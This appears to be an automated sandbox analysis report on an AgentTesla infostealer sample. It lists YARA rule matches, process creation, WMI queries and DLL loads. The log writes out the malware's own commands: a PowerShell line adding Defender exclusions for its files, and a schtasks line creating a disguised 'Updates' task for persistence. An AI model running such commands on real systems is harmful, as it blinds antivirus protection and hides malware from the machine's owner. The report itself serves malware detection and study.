          Source: 0.2.file.exe.4099970.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
          Source: 0.2.file.exe.4099970.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 0.2.file.exe.4176818.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
          Source: 0.2.file.exe.4176818.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 0.2.file.exe.4099970.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
          Source: 0.2.file.exe.4099970.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 0.2.file.exe.40d9f78.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
          Source: 0.2.file.exe.40d9f78.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 0.2.file.exe.4176818.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
          Source: 0.2.file.exe.4176818.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
          Source: 0000000C.00000002.3811121653.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
          Source: 00000010.00000002.3811125875.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
          Source: 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
          Source: 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
          Source: Process Memory Space: file.exe PID: 8144, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
          Source: Process Memory Space: file.exe PID: 8144, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: Process Memory Space: NnXVkDOvj.exe PID: 2832, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
          Source: Process Memory Space: NnXVkDOvj.exe PID: 2832, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: NnXVkDOvj.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, BqKGVR3k2PVtU8wwGi.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.file.exe.7c80000.8.raw.unpack, BqKGVR3k2PVtU8wwGi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.file.exe.7c80000.8.raw.unpack, BqKGVR3k2PVtU8wwGi.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.file.exe.7c80000.8.raw.unpack, CSlvcL92iSwxSZ6lOu.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.file.exe.7c80000.8.raw.unpack, CSlvcL92iSwxSZ6lOu.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, BqKGVR3k2PVtU8wwGi.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, BqKGVR3k2PVtU8wwGi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, BqKGVR3k2PVtU8wwGi.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, CSlvcL92iSwxSZ6lOu.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, CSlvcL92iSwxSZ6lOu.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/17@1/1
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5704:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD1A2.tmpJump to behavior
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exeReversingLabs: Detection: 28%
          Source: file.exeVirustotal: Detection: 40%
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NnXVkDOvj.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe C:\Users\user\AppData\Roaming\NnXVkDOvj.exe
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpE3F1.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeProcess created: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe "C:\Users\user\AppData\Roaming\NnXVkDOvj.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NnXVkDOvj.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpE3F1.tmp"
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeProcess created: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe "C:\Users\user\AppData\Roaming\NnXVkDOvj.exe"
          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iconcodecservice.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
